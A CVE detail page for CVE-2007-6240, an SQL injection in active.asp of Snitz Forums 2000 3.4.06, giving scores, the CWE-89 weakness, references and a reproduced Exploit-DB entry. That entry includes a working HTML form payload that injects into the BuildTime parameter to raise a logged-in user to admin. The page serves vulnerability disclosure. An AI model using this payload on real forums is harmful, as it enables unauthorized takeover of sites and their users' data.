CVE-2007-6240 : Detail

CVE-2007-6240

SQL Injection
A03-Injection
0.45%V4
Network
2007-12-05
10h00 +00:00
2018-10-15
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

SQL injection vulnerability in active.asp in Snitz Forums 2000 3.4.06 allows remote attackers to execute arbitrary SQL commands via the BuildTime parameter.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 4687

Publication date : 2007-12-02 23h00 +00:00
Author : BugReport.IR
EDB Verified : Yes

########################## WwW.BugReport.IR ######################### # # AmnPardaz Security Research & Penetration Testing Group # # Title: A user can gain admin level in snitz 2000 by SQL Injection # vendor: http://forum.snitz.com/ # Googling: "Powered by Snitz" > 2,440,000 victims # Last bug report in 2007-02-16 with 4692 visitors # Exploit: Available # Fix Available: Update to last version. ######################## Bug Description ########################### A user can gain admin level in the forum and can access to the forum. It is because of a SQL Injection in "Active.asp" After login to your VICTIM forum, execute below script ~~~~~~~~~~~Start HTML Exploit~~~~~~~~~ <form action="http://[VICTIM URL]/active.asp" method="post"> Query: <input type="text" name="BuildTime" value="',M_Level='3" /><br /> DefaultValues: <input type="text" name="AllRead" value="Y" /><br /> Submit: <input type="submit" name="submit" value="Submit" /><br /> </form> ~~~~~~~~~~~End HTML Exploit~~~~~~~~~ ##################################################################### # Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com # Country: Iran # Contact: admin@bugreport.ir # Credit: Soroush Dalili found this bug. ##################################################################### # milw0rm.com [2007-12-03]

Products Mentioned

Configuraton 0

Snitz_communications>>Snitz_forums_2000 >> Version 3.4.06

References

http://osvdb.org/39002
Tags : vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/27911
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/26688
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/4687
Tags : exploit, x_refsource_EXPLOIT-DB